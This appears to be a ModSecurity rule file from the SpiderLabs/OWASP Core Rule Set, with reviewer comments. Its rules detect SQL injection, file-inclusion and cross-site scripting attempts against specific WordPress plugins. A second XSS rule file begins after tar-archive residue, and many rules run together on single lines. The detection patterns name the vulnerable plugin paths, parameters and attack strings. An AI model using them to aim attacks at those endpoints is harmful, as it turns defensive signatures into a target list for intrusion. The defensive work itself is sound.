Attempt -- massedit_album.php gall_id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012479) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id INSERT SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012479,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id INSERT',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012480) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id DELETE SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012480,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id DELETE',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012481) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash 
Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id ASCII SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012481,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id ASCII',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012482) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012482,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012571) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/jquery-mega-menu/skin.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012571,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:skin "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012581) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/lazyest-gallery/lazyest-popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012581,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:image "(?i:image\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012601) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/lazyest-gallery/lazyest-popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012601,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery 
Plugin image Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
    SecRule ARGS:image "(?i:image\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"
# NOTE(review): the chain completed above belongs to rule 2012601, whose
# starter begins on the previous line of this file. It uses the same
# lazyest-popup.php path test, the same ARGS:image pattern and the same message
# as rule 2012581 directly before it; only the id differs. A request matching
# one matches both, so tx.critical_anomaly_score is added twice. Confirm
# whether the duplicate is intended; if not, disable one of the two ids.

# Shape shared by the rules below: each is a ModSecurity chain. The chain
# starter carries the metadata (id, rev, msg, tag, severity) and `block`; the
# last link carries the setvar actions. Every link must match. On a full match
# the last link adds tx.critical_anomaly_score to tx.anomaly_score, stores the
# message in tx.msg and records the matched variable under
# tx.<rule id>-WEB_ATTACK/WORDPRESS-<matched variable name>.

# (2012705) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt
# Links: (1) request line contains the openfile.php plugin path,
# (2) request line contains "GET ", (3) ARGS:file contains "../".
# NOTE(review): link 2 confines the rule to request lines containing "GET ".
# If the endpoint also reads `file` from requests sent with another method,
# this rule does not inspect them -- confirm, and drop the method test if so.
# NOTE(review): the t: transformations are declared on the chain starter only.
# Whether they also apply to ARGS:file depends on how the deployed ModSecurity
# version treats chained rules, and t:normalisePathWin normalises directory
# references, which matters for a "../" test -- verify with a regression
# request.
SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-publication-archive/includes/openfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012705,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2012722) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability
# Links: (1) request line contains the inline-admin.js.php path,
# (2) ARGS:default_services matches the pattern.
# NOTE(review): ARGS:default_services is matched against the parameter's
# value, yet the pattern starts with the literal text "default_services="
# (\x3d is "="). As written it can only match when the value itself contains
# that text followed by one of the keywords. This looks like a leftover from a
# URI-based source signature -- confirm, then either match the keyword list
# directly or test a variable that still contains the parameter name. Rule
# 2012946 below is built the same way.
# NOTE(review): the keywords are plain substrings with no word boundary, so
# ordinary words containing "script" satisfy that part of the pattern; tighten
# it before loosening the prefix, or expect false positives in blocking mode.
SecRule REQUEST_LINE "@contains /plugins/socialgrid/static/js/inline-admin.js.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012722,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability',tag:'web-application-attack'"
    SecRule ARGS:default_services "(?i:default_services\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2012946) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt
# Links: (1) request line contains the inline-gallery browser.php path,
# (2) ARGS:do matches the pattern. The pattern requires the literal "do="
# inside the parameter value (see the note on rule 2012722).
SecRule REQUEST_LINE "@contains /plugins/inline-gallery/browser/browser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012946,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46781'"
    SecRule ARGS:do "(?i:do\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2013155) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter SELECT FROM SQL Injection Attempt
# Links: (1) request line contains the hitcounter.php plugin path,
# (2) request line contains "GET ", (3) ARGS:pid contains SELECT followed,
# after at least one character, by FROM (case-insensitive). The action list of
# link 3 continues on the next line of the file.
# NOTE(review): as with rule 2012705, the "GET " link leaves other request
# methods uninspected by this rule -- confirm that is intended.
SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013155,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:pid "(?i:SELECT.+FROM)"
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013156) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013156,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013157) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013157,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UNION SELECT SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013158) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013158,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013159) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013159,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013308) SpiderLabs Research (SLR) Public Vulns: ET 
WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt
# Rule 2013308 (its header comment starts on the previous line of the file).
# Shape shared by the rules below: each is a ModSecurity chain. The chain
# starter carries the metadata (id, rev, msg, tag, severity) and `block`; the
# last link carries the setvar actions. Every link must match. On a full match
# the last link adds tx.critical_anomaly_score to tx.anomaly_score, stores the
# message in tx.msg and records the matched variable under
# tx.<rule id>-WEB_ATTACK/WORDPRESS-<matched variable name>.
#
# Links: (1) request line contains the admin_container.php plugin path,
# (2) request line contains "GET ", (3) ARGS:page matches "page=", optional
# whitespace, then an ftp/ftps/http/https/php scheme followed by ":/".
# NOTE(review): ARGS:page is matched against the parameter's value, yet the
# pattern starts with the literal text "page=". As written it can only match
# when the value itself contains "page=" before the scheme. This looks like a
# leftover from a URI-based source signature -- confirm, then either drop the
# prefix and anchor the scheme test, or test a variable that still contains
# the parameter name.
# NOTE(review): link 2 confines rules 2013308 and 2013309 to request lines
# containing "GET "; requests sent with another method are not inspected by
# them -- confirm that is intended.
SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013308,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:page "(?i:page=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2013309) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt
# Links: (1) same admin_container.php path, (2) request line contains "GET ",
# (3) ARGS:page contains "../".
# NOTE(review): the t: transformations are declared on the chain starter only.
# Whether they also apply to ARGS:page depends on how the deployed ModSecurity
# version treats chained rules, and t:normalisePathWin normalises directory
# references, which matters for a "../" test -- verify with a regression
# request.
SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013309,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:page "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2013310) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt
# Links: (1) same admin_container.php path, (2) ARGS:title matches the
# pattern.
# NOTE(review): the pattern requires the literal "title=" (\x3d is "=") inside
# the parameter value, the same construction flagged on rule 2013308; rules
# 2013425 and the following eShop rule repeat it with their own parameter
# names. The keywords are plain substrings with no word boundary, so ordinary
# words containing "script" satisfy that part -- tighten the list before
# loosening the prefix.
SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013310,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
    SecRule ARGS:title "(?i:title\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2013425) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt
# Links: (1) request line contains "page=eshop-templates.php" (a query-string
# fragment rather than a file path), (2) ARGS:eshoptemplate matches the
# pattern.
# NOTE(review): link 1 only sees the parameter when it is part of the request
# line; presumably the admin page is always addressed that way -- confirm.
SecRule REQUEST_LINE "@contains page=eshop-templates.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013425,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
    SecRule ARGS:eshoptemplate "(?i:eshoptemplate\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2013426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt
# Chain starter: request line contains "page=eshop-orders.php". Its action
# list and the chained ARGS:action test continue on the next line of the file.
SecRule REQUEST_LINE "@contains page=eshop-orders.php"
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013426,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:action "(?i:action\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains page=eshop-orders.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013427,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:viewemail "(?i:viewemail\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013464) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/ungallery/source_vuln.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013464,rev:1,msg:'SLR: ET 
WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pic "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_WORDPRESS_RULES �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_xss_attacks.conf�������0000664�0000000�0000000�00000563126�12164572564�0033130�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
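# ---------------------------------------------------------------
#
# This ruleset was created by Trustwave SpiderLabs Research Team and includes data from:
#
# http://www.emergingthreats.net/
#

# Gate rule: when REQUEST_FILENAME matches none of the phrases in
# modsecurity_46_slr_et_xss.data, skip every rule up to the
# END_SLR_ET_XSS_RULES marker. The application-specific rules below are
# therefore only evaluated for file names listed in that data file.
SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_xss.data" "id:'2000006',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_XSS_RULES"

# Layout of the rules in this file:
#   * The chain starter matches a path fragment in REQUEST_LINE and carries
#     the metadata (id, rev, msg, severity, tags) and the disruptive action.
#   * The last rule of the chain either runs a script-tag regex over
#     QUERY_STRING|REQUEST_BODY, or counts TX variables whose name matches
#     /XSS.*ARGS:<param>/ ("@gt 0"). TX variables with such names follow the
#     same 'tx.<rule.id>-WEB_ATTACK/XSS-<matched_var_name>' scheme these rules
#     use in their own setvar; presumably they are set by generic XSS rules
#     that run earlier -- verify the include order.
#   * On a match the chain raises tx.anomaly_score by
#     tx.critical_anomaly_score and records the matched variable.
#
# NOTE(review): the t: transformations appear only on the chain starter.
# If chained rules do not inherit them in the deployed ModSecurity version
# (confirm against SecDefaultAction), the QUERY_STRING|REQUEST_BODY regexes
# and the "@contains form[" checks below see the raw, still URL-encoded
# request and will miss percent-encoded brackets and angle brackets.

# (2003905) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mods
SecRule REQUEST_LINE "@contains /search/list/action_search/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003905,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mods',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'"
    SecRule REQUEST_LINE "@contains form[mods][" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mods',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003906) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form
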